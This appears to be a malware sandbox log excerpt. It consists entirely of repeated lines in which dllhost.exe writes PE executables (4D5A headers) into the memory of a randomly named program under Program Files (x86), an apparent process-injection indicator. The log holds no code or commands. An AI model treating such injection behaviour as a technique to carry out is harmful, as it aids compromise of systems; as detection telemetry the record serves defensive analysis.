Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000 value starts with: 4D5A
